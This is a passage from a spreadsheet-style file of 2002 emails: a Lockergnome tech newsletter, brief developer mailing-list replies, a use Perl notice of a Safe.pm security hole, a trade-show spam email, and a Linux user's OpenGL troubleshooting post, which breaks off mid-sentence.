    <t xml:space="preserve">&lt;html&gt;&lt;head&gt;&lt;!--
       CLICK HERE to read this newsletter on the Web for FREE:
       &lt;a href="http://www.lockergnome.com/issues/daily/20020718.html"&gt;
       http://www.lockergnome.com/issues/daily/20020718.html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&lt;/style&gt;&lt;title&gt;20020718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07.18.2002 GnomeREPORT &lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;p class="sidebar"&gt;&lt;table cellpadding="10" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;&lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;b&gt;GET WINDOWS XP TIPS:&lt;/b&gt; Months after the release of Windows XP Professional and Home editions, people are still learning the nuances of Microsoft's newest operating system. Whether you've been using it for a while or are planning to upgrade to the new OS soon, this ebook is right up your alley. &lt;a href="http://store.eSellerate.net/s.asp?s=STR550611850&amp;Cmd=BUY&amp;SKURefnum=SKU3000768669&amp;AFFIDC=AFF669529939"&gt;GET YOUR COPY&lt;/a&gt; of Lockergnome's Top 50 Windows XP tips now!    
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;
 I don't go to many concerts, but that doesn't mean I don't
 appreciate listening to &lt;a href="http://mp3.lockergnome.com/"&gt;good
 music&lt;/a&gt; at every waking moment. Tonight, a handful of Bay
 Gnomies and I watched They Might Be Giants rock the Fillmore.
 Melanie, Steve, Brent, Missy, Robert, Patrick, Gretchen, Matt, and
 Mindy had a total blast. Well, it wasn't much fun when Robert got
 his digital camera confiscated - but this was a show worthy of
 five &lt;a href="http://www.squeeek.com/brent/blog-archives/000438.html"&gt;megapixels&lt;/a&gt;
 (believe me)! Brent went to
 the show last night, and I saw them play on the set earlier this
 afternoon. They were selling a new CD (which had JUST been
 released the other day); "They Got Lost" is full of a few
 previously-unavailable tracks. If you aren't sure about purchasing
 it outright, I strongly urge you to sign up for a trial &lt;a
 href="http://mp3.lockergnome.com/"&gt;EMusic account&lt;/a&gt; and download
 a few of their songs in MP3 format. Oh, and check out the opening
 act: Noe Venable. She's got
 &lt;a href="http://www.noevenable.com/music.php"&gt;a few free MP3s&lt;/a&gt; on
 her site, too. Give "Boots" a shot - very nice.
 &lt;p&gt;
 Does anybody know how to set a binary clock? Melanie got it for me
 as a gift (which was a very nice gesture). Sure, I could read the
 manual - but the ones and zeros start to look eerily similar after
 flipping past the first page. You know me: I'm not much of a math
 guy. In fact, I just discovered the other day that 'byte' was
 short for 'by eight' (even though I already knew that 'bit'
 represented 'binary digit'). I'd stick with a digital timepiece,
 but it just isn't geeky enough for me anymore. How sad is that?
 I'm ready to walk on the wild side. Maybe I'll get my laptop
 pierced tomorrow? It could happen. I've been known to do nutty
 things on a moment's notice, like changing my default Web browser.
 Courtesy of &lt;a href="http://www.newarchitectmag.com/documents/s=2415/na0802q/"&gt;Asa
 Dotzler&lt;/a&gt;, I have an official Mozilla sticker, CD, and t-shirt
 (which you saw me model in my Webcam the other day). Don't be too
 jealous; &lt;a href="http://www.mozilla.org/"&gt;Mozilla.org&lt;/a&gt; has
 plenty of goodies to go around.
 &lt;p&gt;
 Looks as though &lt;a href="http://www.lockergnome.com/issues/digitalmedia/20020717.html"&gt;Jake
 and Lori&lt;/a&gt; are already having a blast in St. Louis.
 They're at the Shareware Industry Conference, along with hundreds
 of well-known program programmers - the people who make our
 computers work the way we want them to work! We're doing our best
 to convince them to join us at &lt;a href="http://www.gnomedex.com/"&gt;Gnomedex&lt;/a&gt;. They ask: "Who else
 is going to be there?" We answer: "People who don't know you yet."
 They ask: "Then why should I come?" We answer: "Because it's a
 business opportunity for you." They ask: "What if I don't want to
 learn anything or meet anybody?" We answer: "We can't really help
 you there, but here - have lunch on us." They ask: "Oh, the
 admission price includes food at at Gnomedex?" We answer: "We
 cannot provide every meal, but you won't go hungry." They ask:
 "So, why Des Moines, when there's nothing to do there." We answer:
 "You're 100% wrong. There *IS* something to do there: Gnomedex."
 Get it? Got it? Good.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&lt;table align="right" bgcolor="#FFFFFF" cellspacing="0" cellpadding="10"&gt;&lt;tr&gt;&lt;td&gt;&lt;table align="left" bgcolor="#990000" cellspacing="0" cellpadding="2"&gt;&lt;tr&gt;&lt;td&gt;&lt;table border="0" cellpadding="4" cellspacing="0"&gt;
 &lt;tr&gt;&lt;td align="center" valign="middle" bgcolor="#FFEEDD"&gt;&lt;font style="font-size: 8pt" face="Tahoma, Helvetica, Arial" size="1"&gt;&lt;B&gt;Latest Downloads&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td bgcolor="#FFEEDD"&gt;&lt;font style="font-size: 8pt" face="Tahoma, Helvetica, Arial" size="1"&gt;
 &lt;A title="freeware: CD player and organizer with CDDB support" HREF="http://www.mywebattack.com/gnomeapp.php?id=103625"&gt;VisiTrax Lite 2.91&lt;/A&gt;&lt;BR&gt;
 &lt;A title="freeware: cut MP3s without decompression" HREF="http://www.mywebattack.com/gnomeapp.php?id=102248"&gt;mp3DirectCut 1.23&lt;/A&gt;&lt;BR&gt;
 &lt;A title="freeware: color  picker and screen loupe" HREF="http://www.mywebattack.com/gnomeapp.php?id=100911"&gt;Cpick 2.6&lt;/A&gt;&lt;BR&gt;
 &lt;A title="freeware: image browser and viewer" HREF="http://www.mywebattack.com/gnomeapp.php?id=101726"&gt;Image Browser 4.4&lt;/A&gt;&lt;BR&gt;
 &lt;A title="freeware: more than 50 customizable Java scripts" HREF="http://www.mywebattack.com/gnomeapp.php?id=105051"&gt;EZ JavaScript 1.1&lt;/A&gt;&lt;BR&gt;
 &lt;A title="freeware: offline browser" HREF="http://www.mywebattack.com/gnomeapp.php?id=101610"&gt;WinHTTrack 3.20RC5&lt;/A&gt;&lt;BR&gt;
 &lt;A title="freeware: specialized virus removal" HREF="http://www.mywebattack.com/gnomeapp.php?id=102533"&gt;Panda Quick Rem 3.2.1.0&lt;/A&gt;&lt;BR&gt;
 &lt;A title="freeware: personal file backup utility" HREF="http://www.mywebattack.com/gnomeapp.php?id=104556"&gt;EZBack-it-up 1.1&lt;/A&gt;&lt;BR&gt;
 &lt;A title="freeware: small slideshow viewer" HREF="http://www.mywebattack.com/gnomeapp.php?id=105052"&gt;ArtSee 1.0&lt;/A&gt;&lt;BR&gt;
 &lt;A title="freeware: simple WAV file editor" HREF="http://www.mywebattack.com/gnomeapp.php?id=105053"&gt;Soliton 2&lt;/A&gt;&lt;BR&gt;
 &lt;A title="freeware: download manager" HREF="http://www.mywebattack.com/gnomeapp.php?id=100322"&gt;Fresh Download 4.30&lt;/A&gt;&lt;BR&gt;
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;b&gt;GigAlarm v1.201 [33k] W9x/2k/XP FREE&lt;/b&gt;
 &lt;p&gt;
 &lt;a class="URL" href="http://users.bigpond.net.au/glina/GigAlarm.htm"&gt;http://users.bigpond.net.au/glina/GigAlarm.htm&lt;/a&gt;
 &lt;p&gt;
 {String on your finger} Sometimes, I'm a bit like the absent-minded professor... I would forget my own head if it wasn't attached. So naturally, I appreciate any program that can help keep me on track, and with GigAlarm I can setup whatever reminders/alarms I need. However, sometimes a simple text message just won't catch my attention. Well, herein lies the beauty of GigAlarm... it doesn't just have to give you a text alarm! GigAlarm can play a WAV file (random, or your selection), change your background, start a program, or use one of the many Windows shutdown options. My wife has gotten in the habit of using the Shutdown option as an alarm to signal that I have spent too long on the computer. (Lucky for me, there is a snooze button!) NOTE: The author says, "This program is essentially free to use for non-profit purposes... If you find this program useful I would appreciate $10 AUD (or $5 USD) as a token of your appreciation."
 &lt;p&gt;&lt;BR&gt;
 &lt;b&gt;Context Thumbview v1.0.b1 [107k] W9x/2K/XP FREE&lt;/b&gt;
 &lt;p&gt;
 &lt;a class="URL" href="http://contextmagic.netfirms.com/image-viewer/"&gt;http://contextmagic.netfirms.com/image-viewer/&lt;/a&gt;
 &lt;p&gt;
 {Peep show} I'm not always very patient, especially when it comes to my computer. Double-clicking on an image and waiting for it to come up in my image viewer is almost too much for me to handle. Lucky for me, Context Thumbview has made its way onto my system and I no longer have to wait to view an image. All I do now is right-click the image, choose "View Thumbnail," and there is the image, out there for me to see... all without me having to open up any programs! "As Express ThumbView is an Explorer extension, it is always ready and available for use. Moreover, it is available in any Explorer window, including Open and Save As... dialog boxes." As an added bonus, with Context Thumbview installed on my system, I can also turn off the thumbnail view if I want to save system resources.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&lt;b&gt;Starter v5.5.4.2175 [423k] W9x/2k/XP FREE&lt;/b&gt;
 &lt;p&gt;
 &lt;a class="URL" href="http://codestuff.tripod.com/"&gt;http://codestuff.tripod.com/&lt;/a&gt;
 &lt;p&gt;
 {Startup manager} This application bills itself as "Yet Another Startup Manager"... I don't think so! Starter isn't JUST another Startup Manager, it's a piece of programming art. One of my biggest problems with Windows Task Manager is that I don't know what all the processes on my machine are, or from where they are running. Starter not only gives me that information, but it also lets me save it as an HTML file. In addition, Starter lets me import and export registry keys or add a new task to be processed. Don't run all over your machine trying to find all the programs you need to control your PC, when you can do it all (and more!) with Starter.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&lt;b&gt;Aversoft Sticker v3.55 [592k] W9x/2k/XP US$15&lt;/b&gt;&lt;BR&gt;
     Unearthed by Sergei Lepyokhin
 &lt;p&gt;
 &lt;a class="URL" href="http://www.aversoft.com/sticker/"&gt;http://www.aversoft.com/sticker/&lt;/a&gt;
 &lt;p&gt;
 {Sticky notes} Did you know that Post-it(r) Notes were invented by accident? I use to have these notes all over my monitor. Now my screen is clean as a whistle! Aversoft Sticker is a program to help you remember "important information by displaying skinnable sticky notes on your Windows desktop." No more bland notes for me! With Sticker, I am surrounded with pictures of paradise (downloaded from Aversoft's website). These great features are no accident. Sticker also has a transparency feature that makes the notes only half visible, making it much easier to use while working on your other programs. Don't walk away yet though... Sticker also allows you to print your notes, lock them from accidentally being deleted, and set an alarm (repeating or one-time). Speaking of alarms, mine just went off and opened up Outlook. Time to send out today's newsletter!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&lt;b&gt;Wikipedia Encyclopedia&lt;/b&gt;
 &lt;p&gt;
 &lt;a class="URL" href="http://www.wikipedia.com/"&gt;http://www.wikipedia.com/&lt;/a&gt;
 &lt;p&gt;
 {We is smart} Those Saturday morning folks at ABC were right: it's great to learn, 'cause knowledge is power. I highly encourage everyone to learn something new each day, and with Wikipedia.com you can! Wikipedia is a free, and very thorough online encyclopedia; you'll be hard-pressed to stump this information tool with an undocumented topic. Know what you're looking for? Then just use the search tool. In the mood to fill your cranium with a few new thought processes? Just browse through any one of Wikipedia's many categories until you find a subject that piques your interest. From Physics to Opera; from Anthropology to Cooking, you will find it all here. Now, all that is missing is you! Take a look and beef up your gray matter.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Gnomies are known for their willingness to help others and Alex Warren is no exception with a tip on copying text. Alex writes: "Did you know that you can copy the contents of a message/dialog box just by pressing Ctrl+C?" Alex also had this to say: "When you select text and then use the mouse to drag it to a new location, the original text moves to the new location and disappears from the old location. However, you can select text and then use the right mouse button to drag it to a new location. When you do this, releasing the right mouse button opens a menu from which you can choose to move or copy the text (along with several other options)." Those are some great time saving tips Alex! Following suit with using Ctrl + C to copy... you can also use Ctrl + X to cut and Ctrl + V to paste. You can also use all these tips on more then just text! The next time you need to copy some files on your PC, try the right-click and drag method and you will see what I mean... along with saving yourself some time.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href="http://www.lockergnome.com/issues/daily/20020718.html"&gt;http://www.lockergnome.com/issues/daily/20020718.html&lt;/a&gt;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Sticker Courtesy   --&gt;
 Bacteria acts more intelligent than human beings.
 &lt;/font&gt;
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/body&gt;&lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">
     Guido&gt; Why would we care about installing a few extra files, as long as
     Guido&gt; they're inside a package?
 I guess you needn't worry about that.  It just doesn't seem "clean" to me.
 S
</t>
  </si>
  <si>
    <t xml:space="preserve">
     Tim&gt; About half the developers on the spambayes project were missing
     Tim&gt; some permission or other, so I ran thru all of them and checked
     Tim&gt; every damned box and clicked on every damn dropdown list I could
     Tim&gt; find.  As far as SF is concerned, you're all sitting on God's Right
     Tim&gt; Hand now, so if it still doesn't work I suggest you upgrade to
     Tim&gt; Win98 &lt;wink&gt;.
 Time to upgrade I guess. :-(
     % cvs add unheader.py 
     cvs [server aborted]: "add" requires write access to the repository
 I'll try a checkout into a new directory...
 S
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [use Perl] Stories for 2002-10-07
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Newsletter
 In this issue:
     * Security hole found in the Safe module
 +--------------------------------------------------------------------+
 | Security hole found in the Safe module                             |
 |   posted by rafael on Sunday October 06, @06:21 (modules)          |
 |   http://use.perl.org/article.pl?sid=02/10/06/1118222              |
 +--------------------------------------------------------------------+
 [0]rafael writes "A security hole has been discovered in Safe.pm. When a
 Safe compartment has already been used, there's no guarantee that it's
 safe any longer, because there's a way for code executed within the Safe
 compartment to alter its operation mask. (Thus, programs that use a Safe
 compartment only once aren't affected by this bug.)" Read below for the
 fixes...
 This story continues at:
     http://use.perl.org/article.pl?sid=02/10/06/1118222
 Discuss this story at:
     http://use.perl.org/comments.pl?sid=02/10/06/1118222
 Links:
     0. http://use.perl.org/~rafael/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</si>
  <si>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Peter Peltonen wrote:
 &gt; Sorry about that :) 
 &gt; 
 &gt; Didn't think before sending... So I didn't realize that Reply-To was to 
 &gt; the list and not to the sender (as it usually is). 
 How about removing the reply-to to the list?
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: 11th Convergence India 2003 exhibition &amp; conference
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;&lt;HEAD&gt;
 &lt;META http-equiv=Content-Type content="text/html;
 charset=iso-8859-1"&gt;
 &lt;META content="MSHTML 5.50.4134.600" name=GENERATOR&gt;
 &lt;STYLE&gt;&lt;/STYLE&gt;
 &lt;/HEAD&gt;
 &lt;BODY bgColor=#ffffff&gt;
 &lt;DIV&gt;&lt;FONT face=Arial size=2&gt;Dear Sir/Madam,&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=Arial size=2&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=Arial size=2&gt;I got this email id from your
 website.&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=Arial size=2&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV align=justify&gt;&lt;FONT face=Arial size=2&gt;Our organisation,
 Exhibitions India 
 Pvt Ltd organises the annual Convergence India exhibition and
 conference in New 
 Delhi, India during the month of March. &lt;STRONG&gt;Convergence
 India is the longest 
 running international trade-show&lt;/STRONG&gt; and the only forum
 in India to 
 showcase the convergence of voice and data networks, delivery
 of content, 
 television and entertainment applications, broadcast,
 telecommunications, fixed 
 and mobile networks, internet, computing etc.&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=Arial size=2&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV align=justify&gt;&lt;FONT face=Arial size=2&gt;For the same, I
 would like to contact 
 the concerned person in your organisation. Could you please
 advise his/her 
 complete contact details or please forward the following mail
 to him/her. In 
 case you are the decision&amp;nbsp;maker about participation in
 international 
 exhibitions, following this mail is some information on our
 annual 
 event.&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=Arial size=2&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=Arial size=2&gt;Thank you in
 advance.&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=Arial size=2&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=Arial size=2&gt;Sincerely and with best
 regards,&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=Arial size=2&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=Arial size=2&gt;Deepak Kr. Nagpal&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=Arial size=2&gt;Executive Marketing&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=Arial size=2&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=Arial size=2&gt;Exhibitions India Pvt.
 Ltd.&lt;BR&gt;A-17 2nd 
 Floor&lt;BR&gt;DDA SCO Complex&lt;BR&gt;Near Moolchand Flyover&lt;BR&gt;Defence
 Colony&lt;BR&gt;New 
 Delhi 110 024&lt;BR&gt;Tel:&amp;nbsp; +91 11 463 8680-84&lt;BR&gt;Fax: +91 11
 463 3506, 462 
 3320&lt;BR&gt;email: &lt;A 
 href="mailto:exhibitionsindia@vsnl.com"&gt;exhibitionsindia@vsnl
 .com&lt;/A&gt;&lt;BR&gt;website: 
 &lt;A 
 href="http://www.exhibitionsindia.org"&gt;www.exhibitionsindia.o
 rg&lt;/A&gt;&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=Arial size=2&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=Arial size=2&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=Arial size=2&gt;&lt;STRONG&gt;INFORMATION ABOUT THE 
 EVENT&lt;/STRONG&gt;&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=Arial size=2&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV&gt;
 &lt;DIV align=justify&gt;&lt;FONT face=Arial&gt;Exhibitions India
 organises the Convergence 
 India &amp;nbsp;exhibition &amp;amp; conference, which is the
 &lt;STRONG&gt;longest running 
 international trade-show&lt;/STRONG&gt; and the only forum in India
 to showcase the 
 convergence of voice and data networks, delivery of content,
 television and 
 entertainment applications, broadcast, telecommunications,
 fixed and mobile 
 networks, internet, computing etc.&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV align=justify&gt;&lt;FONT face=Arial&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV align=justify&gt;&lt;FONT face=Arial&gt;Exhibitions India invites
 you to participate 
 at the&amp;nbsp;&lt;STRONG&gt;11th Convergence India 2003 exhibition
 &amp;amp; 
 conference&lt;/STRONG&gt;, which will be at &lt;STRONG&gt;Pragati Maidan,
 New Delhi, 
 India&lt;/STRONG&gt; during&amp;nbsp;&lt;STRONG&gt;11-13 March
 2003.&lt;/STRONG&gt;&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV align=justify&gt;&lt;FONT face=Arial&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV align=justify&gt;&lt;FONT face=Arial&gt;&lt;FONT face=Arial
 size=2&gt;&lt;STRONG&gt;The 
 Government of India has recently mandated the Conditional
 Access System for 
 distribution of satellite television channels. This has
 created a whole new 
 marketplace in the Indian cable industry. Once this bill is
 made an act, it will 
 be mandatory for cable operators to distribute pay channels
 through a set-top 
 box.&lt;BR&gt;&lt;BR&gt;&lt;/STRONG&gt;&lt;STRONG&gt;India has an estimated 38
 million cable homes! The 
 implementation of this change will require massive
 investments in set-top boxes, 
 conditional access software and the upgradation of headend
 networks - a great 
 oppotunity for you to tap this huge market!! Exhibiting your
 products at the 
 11th Convergence India exhibition will give you an
 opportunity to meet 
 &lt;EM&gt;&lt;U&gt;all your&lt;/U&gt;&lt;/EM&gt;&amp;nbsp; targetted visitors under a
 single 
 roof.&lt;BR&gt;&lt;/STRONG&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;FONT face=Arial&gt;Other
 exhibits will be from 
 various industries including high speed networking, internet
 telephony, mobile 
 and satellite communications, network infrastructure, optical
 access networking, 
 portable communication devices, t&amp;amp;m and interactive
 media, VoIP, wireless 
 access, 3G, m-commerce, multimedia broadband services via
 satellite, conditional 
 access technologies, satellite receivers and transmitters,
 encoders, decoders, 
 and the latest in broadcast, cable and satellite
 equipment,&amp;nbsp;mobile phone 
 accesories&amp;nbsp; etc.&lt;BR&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;FONT face=Arial&gt;&lt;FONT
 face=Arial&gt;We 
 successfully concluded the &lt;STRONG&gt;10th &lt;/STRONG&gt;Convergence
 India 2002 
 exhibition and conference at New Delhi - the event
 had&amp;nbsp;176 exhibitors from 
 17&amp;nbsp;countries displaying their equipment and technologies
 to a discerning 
 audience of&amp;nbsp;16,093 visitors from the industry,
 government, related trade 
 associations. The event got extensive coverage from
 the&amp;nbsp;media - both print 
 and electronic. The three day high profile conference had
 over 1374 delegates. 
 Highlights of the event were&amp;nbsp;country pavilions from
 &lt;STRONG&gt;USA&lt;/STRONG&gt;, 
 &lt;STRONG&gt;FRANCE&lt;/STRONG&gt;, &lt;STRONG&gt;CHINA &lt;/STRONG&gt;&amp;amp; the
 &lt;STRONG&gt;VoIP 
 &lt;/STRONG&gt;Technology Pavilion.&lt;/FONT&gt;&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV align=justify&gt;&lt;STRONG&gt;&lt;FONT face=Arial&gt;More about the
 next 
 event:&lt;/FONT&gt;&lt;/STRONG&gt;&lt;/DIV&gt;
 &lt;DIV align=justify&gt;&lt;STRONG&gt;&lt;FONT
 face=Arial&gt;&lt;/FONT&gt;&lt;/STRONG&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV align=justify&gt;&lt;STRONG&gt;&lt;FONT face=Arial&gt;&lt;U&gt;Convergence
 India is certified by 
 the&amp;nbsp;US Department of Commerce
 since&amp;nbsp;1994&lt;/U&gt;.&lt;/FONT&gt;&lt;/STRONG&gt;&lt;/DIV&gt;
 &lt;DIV align=justify&gt;&lt;STRONG&gt;&lt;FONT
 face=Arial&gt;&lt;/FONT&gt;&lt;/STRONG&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV align=justify&gt;&lt;STRONG&gt;&lt;FONT face=Arial&gt;&lt;U&gt;UK Group
 Participation&lt;/U&gt;&amp;nbsp;: 
 Trade Fairs Support,UK&lt;/FONT&gt;&lt;/STRONG&gt;&lt;/DIV&gt;
 &lt;DIV align=justify&gt;
 &lt;DIV&gt;
 &lt;P align=justify&gt;&lt;FONT
 face=Arial&gt;&lt;STRONG&gt;&lt;U&gt;Co-organisers&lt;/U&gt;:&lt;BR&gt;&lt;/STRONG&gt;- 
 Ministry of Communications &amp;amp; IT, Government&amp;nbsp;of
 India&lt;BR&gt;- Association 
 of Basic Telecom Operators&lt;BR&gt;- Cellular Operators
 Association of India&lt;BR&gt;- 
 Indo-American Chamber of Commerce&lt;BR&gt;- VSAT Services
 Association of India&lt;BR&gt;- 
 Telecom Equipment Manufacturers Association of India
 (TEMA)&lt;BR&gt;- Internet 
 Service Providers Association of India (ISPAI&lt;/FONT&gt;&lt;/P&gt;
 &lt;DIV align=justify&gt;&lt;STRONG&gt;&lt;FONT 
 face=Arial&gt;&lt;U&gt;Supports&lt;/U&gt;:&lt;/FONT&gt;&lt;/STRONG&gt;&lt;/DIV&gt;
 &lt;DIV align=justify&gt;&lt;FONT face=Arial&gt;All India Aavishkar Dish
 Antenna Sangh, 
 India, Cable Operators Federation of India,
 India,&amp;nbsp;Economics, Finance &amp;amp; 
 Trade Commission of France (UBI France),&amp;nbsp;Electronic
 Component Industries 
 Association, India,&amp;nbsp;Global VSAT Forum,
 UK,&amp;nbsp;International Broadcasting 
 Convention (IBC), UK,&amp;nbsp;National Association of
 Broadcasters (NAB), 
 USA,&amp;nbsp;Swiss Multimedia Association,
 Switzerland,&amp;nbsp;Telecom Users Group of 
 India, India,&amp;nbsp;The Institution of Electronics and
 Telecommunication 
 Engineers, India&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV align=justify&gt;&lt;STRONG&gt;&lt;FONT
 face=Arial&gt;&lt;/FONT&gt;&lt;/STRONG&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV align=justify&gt;&lt;STRONG&gt;&lt;FONT face=Arial&gt;Participation 
 Cost:&lt;/FONT&gt;&lt;/STRONG&gt;&lt;/DIV&gt;
 &lt;DIV align=justify&gt;
 &lt;DIV align=justify&gt;&lt;STRONG&gt;&lt;FONT face=Arial&gt;Shell
 Space:&amp;nbsp;&amp;nbsp;&amp;nbsp; US $ 
 250 per sqm (minimum 9 sqm)&lt;/FONT&gt;&lt;/STRONG&gt;&lt;/DIV&gt;
 &lt;DIV align=justify&gt;&lt;STRONG&gt;&lt;FONT face=Arial&gt;Raw 
 Space:&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;US $ 220 per
 sqm&amp;nbsp;(minimum 18 
 sqm)&lt;/FONT&gt;&lt;/STRONG&gt;&lt;/DIV&gt;
 &lt;DIV align=justify&gt;&lt;FONT face=Arial&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;STRONG&gt;&lt;FONT face=Arial&gt;Please visit our website (&lt;A 
 href="http://www.exhibitionsindia.org"&gt;www.exhibitionsindia.o
 rg&lt;/A&gt;) for further 
 details.&amp;nbsp;&lt;/FONT&gt;&lt;/STRONG&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;STRONG&gt;&lt;FONT
 face=Arial&gt;&lt;/FONT&gt;&lt;/STRONG&gt;&amp;nbsp;&lt;/DIV&gt;&lt;/DIV&gt;&lt;/DIV&gt;&lt;/DIV&gt;
 &lt;DIV align=justify&gt;&lt;STRONG&gt;&lt;FONT face=Arial&gt;We
 await&amp;nbsp;your 
 confirmation!!&lt;/FONT&gt;&lt;/STRONG&gt;&lt;/DIV&gt;&lt;/DIV&gt;&lt;/BODY&gt;&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wednesday 31 Jul 2002 9:53 am, Ralf Ertzinger wrote:
 &gt; Hi.
 &gt;
 &gt; John Hinsley &lt;johnhinsley@blueyonder.co.uk&gt; wrote:
 &gt; &gt; Querying the rpm database for OpenGL gets me nowhere fast. Can anyone
 &gt; &gt; point me in the right direction? What, in RedHat, provides OpenGL?
 &gt;
 &gt; The X server itself does (or does not, depending on your driver). There
 &gt; is a software fallback called Mesa compiled in the X server, which
 &gt; is used as a fallback. So, if you have installed X, you have OpenGL.
 &gt; Try the glxinfo command to see the capabilities provided by your
 &gt; X system.
 I get:
 [john@localhost john]$ glxinfo
 name of display: :0.0
 display: :0  screen: 0
 direct rendering: Yes
 server glx vendor string: NVIDIA Corporation
 server glx version string: 1.2
 server glx extensions:
     GLX_EXT_visual_info, GLX_EXT_visual_rating, GLX_SGIX_fbconfig,
     GLX_SGIX_pbuffer
 client glx vendor string: NVIDIA Corporation
 client glx version string: 1.2
 client glx extensions:
     GLX_ARB_get_proc_address, GLX_ARB_multisample, GLX_EXT_visual_info,
     GLX_EXT_visual_rating, GLX_EXT_import_context, GLX_SGI_video_sync,
     GLX_SGIX_swap_group, GLX_SGIX_swap_barrier, GLX_SGIX_fbconfig,
     GLX_SGIX_pbuffer
 GLX extensions:
     GLX_EXT_visual_info, GLX_EXT_visual_rating, GLX_SGIX_fbconfig,
     GLX_SGIX_pbuffer, GLX_ARB_get_proc_address
 OpenGL vendor string: NVIDIA Corporation
 OpenGL renderer string: RIVA TNT2/AGP
 OpenGL version string: 1.3.1 NVIDIA 29.60
 OpenGL extensions:
     GL_ARB_imaging, GL_ARB_multitexture, GL_ARB_texture_env_add,
     GL_ARB_transpose_matrix, GL_EXT_abgr, GL_EXT_bgra,
     GL_EXT_compiled_vertex_array, GL_EXT_draw_range_elements,
     GL_EXT_fog_coord, GL_EXT_multi_draw_arrays, GL_EXT_packed_pixels,
     GL_EXT_point_parameters, GL_EXT_rescale_normal, GL_EXT_secondary_color,
     GL_EXT_separate_specular_color, GL_EXT_stencil_wrap,
     GL_EXT_texture_edge_clamp, GL_EXT_texture_env_add,
     GL_EXT_texture_env_combine, GL_EXT_texture_lod_bias,
     GL_EXT_texture_object, GL_EXT_vertex_array, GL_EXT_vertex_weighting,
     GL_IBM_texture_mirrored_repeat, GL_KTX_buffer_region, GL_NV_blend_square,
     GL_NV_evaluators, GL_NV_fog_distance, GL_NV_packed_depth_stencil,
     GL_NV_texgen_reflection, GL_NV_texture_env_combine4
 glu version: 1.3
 glu extensions:
     GLU_EXT_nurbs_tessellator, GLU_EXT_object_space_tess
    visual  x  bf lv rg d st colorbuffer ax dp st accumbuffer  ms  cav
  id dep cl sp sz l  ci b ro  r  g  b  a bf th cl  r  g  b  a ns b eat
 ----------------------------------------------------------------------
 0x21 16 tc  0 16  0 r  y  .  5  6  5  0  0 16  0 16 16 16 16  0 0 None
 0x22 16 dc  0 16  0 r  y  .  5  6  5  0  0 16  0 16 16 16 16  0 0 None
 0x23 16 tc  0 16  0 r  .  .  5  6  5  0  0 16  0 16 16 16 16  0 0 None
 0x24 16 dc  0 16  0 r  .  .  5  6  5  0  0 16  0 16 16 16 16  0 0 None
 So, I *do* have OpenGL, thanks all.
 Problem is that I can't find an rpm of plib which will install (or recognise 
